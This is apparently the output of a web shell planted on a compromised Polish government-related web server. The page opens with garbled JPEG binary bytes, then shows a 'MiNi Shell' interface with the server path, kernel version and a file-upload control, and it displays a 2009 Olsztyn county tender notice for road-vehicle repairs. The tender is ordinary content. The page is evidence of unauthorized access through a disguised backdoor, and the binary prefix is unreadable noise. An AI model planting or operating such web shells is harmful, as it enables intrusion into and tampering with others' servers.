JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090107/1814-N-2009.html

<p class="kh_header"><b>Olsztyn: Naprawy bieżące pojazdów mechanicznych i sprzętu do letniego i zimowego utrzymania dróg wraz z częściami zamiennymi, z podziałem na zadania:
- Zadanie Nr 1- naprawy pojazdów dla obwodu drogowego w Olsztynku
- Zadanie Nr 2- naprawy pojazdów dla obwodu drogowego w Barczewie
- Zadanie nr 3- naprawy pojazdów dla obwodu drogowego w Dobrym Mieście
- Zadanie nr 4 -naprawy pojadów dla Powiatowej Słuzby Drogowej w Olsztynie</b><br>
<b>Numer ogłoszenia: 1814 - 2009; data zamieszczenia: 07.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowa Służba Drogowa w Olsztynie , ul. Cementowa 3, 10-429 Olsztyn, woj. warmińsko-mazurskie, tel. 089 535 66 30, faks 089 535 66 40.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawy bieżące pojazdów mechanicznych i sprzętu do letniego i zimowego utrzymania dróg wraz z częściami zamiennymi, z podziałem na zadania:
- Zadanie Nr 1- naprawy pojazdów dla obwodu drogowego w Olsztynku
- Zadanie Nr 2- naprawy pojazdów dla obwodu drogowego w Barczewie
- Zadanie nr 3- naprawy pojazdów dla obwodu drogowego w Dobrym Mieście
- Zadanie nr 4 -naprawy pojadów dla Powiatowej Słuzby Drogowej w Olsztynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  naprawa wynikająca z bieżącej eksploatacji pojazdów mechanicznych oraz sprzętu do zimowego i letniego utrzymania dróg wraz z częściami oraz ich pełna obsługa serwisowa, przygotowująca m. In. do przeglądów technicznych , z podziałem na zadania:
- zadanie Nr 1 - naprawa pojazdów dla Obwodu Drogowego Nr 1 w Olsztynku
- zadanie Nr 2 - naprawa pojazdów dla Obwodu  Drogowego Nr 2 w Barczewie
- zadanie Nr 3 - naprawa pojazdów dla obwodu drogowego Nr 3 w Dobrym Mieście
- zadanie Nr 4 - naprawa pojazdów dla Powiatowej Służby Drogowej w Olsztynie 
zgodnie z charakterystyką techniczną przedmiotu zamówienia zamieszczoną poniżej.
2. Wykonawca będzie wykonywał zamówienie przy użyciu własnych materiałów , urządzeń i narzędzi oraz będzie zaopatrywał się w części zamienne we własnym zakresie.   
3. Zamawiający wymaga stosowania przy przeglądach naprawach, części zamiennych i materiałów eksploatacyjnych spełniających normy zalecane przez producenta. Materiały eksploatacyjne oraz części zamienne muszą być fabrycznie nowe , nie noszące śladów uszkodzeń, nie mogą być regenerowane.
4.  Części wymienione podczas naprawy Wykonawca zwraca Zamawiającemu.
5.Przeglady pojazdów będą wykonywane zgodnie z częstotliwością i zakresem wynikającym z Warunków eksploatacji i przeglądów okresowych dla każdego samochodu określonym przez producenta.
6. zamawiający wymaga od Wykonawcy wykonywania usług zgodnie z normami czasowymi wykonania napraw określonymi w katalogach norm czasowych aktualnie obowiązujących u Wykonawcy oraz każdorazowego okazania do wglądu katalogu norm czasowych na żądania Zamawiającego.
7. Zamawiający wymaga od Wykonawcy udzielenia 12 miesięcy gwarancji na wykonany przedmiot  zamówienia.
8. W dniu odbioru naprawionego sprzętu lub pojazdu winna być wydana przez Wykonawcę faktura za wykonaną usługę oraz wypełniony druk zlecenie naprawy dostarczony przez Zamawiającego , jak też winny być wydane zdemontowane części.
9. Zakład naprawczy nie może znajdować się dalej niż 30 km od miejsca garażowania pojazdów  i sprzętu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9, 50.11.20.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia.
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust.1 lub 2 Pzp.
2.	Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty, na zasadzie: spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r- Prawo zamówień publicznych , zwanej dalej ustawą, Zamawiający żąda złożenia:
1)	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2)	oświadczenia o spełnieniu warunków udziału w postępowaniu i niepodleganiu wykluczeniu zgodnie z art. 22 ust.1 i art. 24 ust. 1 i 2  Pzp ( dodatek Nr 1 do SIWZ)
3)	aktualnego zaświadczenia z właściwego urzędu skarbowego, potwierdzającego , ze oferent nie zalega z opłacaniem podatków lub uzyskał zgodę na zwolnienie , odroczenie lub rozłożenie na raty zaległych płatności, wystawione nie wcześniej niż 3 miesięcy przed upływem składania ofert
4)	aktualnego zaświadczenia z właściwego oddziału Zakładu Ubezpieczeń Społecznych, potwierdzającego, że oferent nie zalega z opłacaniem składek na ubezpieczenie społeczne i zdrowotne lub, że uzyskał zgodę na odroczenie albo rozłożenie na raty zaległych płatności, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert . 
2.	W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia , Zamawiający żąda:
1)	Wykazu  wszystkich wykonanych w ciągu 3 lat zamówień publicznych o charakterze i złożoności porównywalnej z przedmiotem zamówienia, popartych dokumentami potwierdzającymi wykonanie zamówień z należytą starannością   (dodatek Nr 2 do SIWZ). Należy wykazać minimum jedno takie zrealizowane zamówienie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 0.40</li>
<li>2 - upust na części - 0.50</li>
<li>3 - odległość zakładu od miejsca garażowania pojazdów - 0.05</li>
<li>4 - dyspozycyjność - 0.05</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.powiat-olsztynski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowa Służba Drogowa 
ul. Cementowa 3
10-429 Olsztyn.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2009 godzina 09:00, miejsce: Siedziba Zamawiającego: Olsztyn, ul. Cementowa 3 , sekretariat IV p. pok. 407.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1- naprawy dla obwodu drogowego w Olsztynku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zadanie Nr 1 
Naprawy dotyczą następującego sprzętu garażowanego w Olsztynku przy ulicy Porannej 36:
- samochód osobowy: Fiat Seicento, Polonez
- samochody dostawcze: Lublin 3322, Żuk A07
- samochody ciężarowe: Mercedes 1617, Mercedes Unimog 404, Man 8150
- ciągnik rolniczy: Ursus C-360, INTER HARV.-IHC(D), Zefir 85
- przyczepy rolnicze i samochodowe
- sprzęt do letniego i zimowego utrzymania dróg.
Wartość zamówienia objętego zadaniem Nr 1 nie może przekroczyć kwoty 44 262,30zł netto, tj.54 000 zł brutto
W przypadku konieczności Zamawiający w powyższej kwocie może zlecić  naprawę pojazdu lub sprzętu innego niż wymieniony w tym zadaniu, a będący w  posiadaniu Zamawiającego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.30.00.00-9, 50.11.20.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.4</li>
<li>2. upust na części zamienne - 0.5</li>
<li>3. odległość zakładu naprawczego od miejsca garażowania pojazdów - 0.05</li>
<li>4. dyspozycyjność - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2- naprawy dla obwodu drogowego w Barczewie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawy dotyczą następującego sprzętu, garażowanego w Barczewie przy ul. Kościuszki 80,
- samochód dostawczy : Lublin 3322, VW Taro
- samochody ciężarowe: Mercedes Unimog 404, Kamaz 5511
- ciągniki rolnicze: Ursus C-360, Ursus C- 385, Zefir 85
- przyczepy rolnicze
- sprzęt do letniego i zimowego utrzymania dróg
Wartość zamówienia objętego zadaniem Nr 2 nie może przekroczyć kwoty 35 245,90 zł netto, tj. 43 000 zł brutto.
W przypadku konieczności Zamawiający w powyższej kwocie może zlecić  naprawę pojazdu lub sprzętu innego niż wymieniony w tym zadaniu, a będący w  posiadaniu Zamawiającego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9, 50.11.20.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.4</li>
<li>2. upust na części zamienne - 0.5</li>
<li>3. odległość zakładu naprawczego odmiejsca garażowania pojazdów - 0.05</li>
<li>4. dyspozycyjność - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3- naprawy dla obwodu drogowego w Dobrym Mieście.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawy dotyczą następującego sprzętu, garażowanego w Dobrym Mieście przy ul. Fabrycznej 34,
- samochód osobowy : Polonez  , Fiat Albea
- samochód dostawczy: Daewoo Lublin 
- samochód ciężarowy: Mercedes 1711
- ciągniki rolnicze: Ursus C- 360, Ursus 912, Zefir 85
- przyczepy rolnicze 
- sprzęt do letniego i zimowego utrzymania dróg 
Wartość zamówienia objętego zadaniem Nr 3 nie może przekroczyć kwoty 27 868,85 zł netto, tj. 34 000 zł brutto.
W przypadku konieczności Zamawiający w powyższej kwocie może zlecić  naprawę pojazdu lub sprzętu innego niż wymieniony w tym zadaniu, a będący w  posiadaniu Zamawiającego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.30.00.00-9, 50.11.20.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.4</li>
<li>2. upust na części zamienne - 0.5</li>
<li>3. odległość zakładu naprawczego od miejsca garażowania pojazdów - 0.05</li>
<li>4. dyspozycyjność - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4- naprawy dla Powiatowej Służby Drogowej w Olsztynie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawy dotyczą następującego sprzętu, garażowanego w Olsztynie przy ul. Cementowej 3 :
- samochody osobowe : VW Transporter, Fiat Seicento, Polonez, Skoda Fabia  2 szt.
Wartość zamówienia objętego zadaniem Nr 4 nie może przekroczyć kwoty 7 377,05 zł netto, tj. 9 000 zł brutto.
W przypadku konieczności Zamawiający w powyższej kwocie może zlecić  naprawę pojazdu lub sprzętu innego niż wymieniony w tym zadaniu, a będący w  posiadaniu Zamawiającego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9, 50.11.20.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.4</li>
<li>2. upust na części zamienne - 0.5</li>
<li>3. odległość zakładu naprawczego od miejsca garażowania pojazdów - 0.05</li>
<li>4. dyspozycyjnosć - 0.05</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com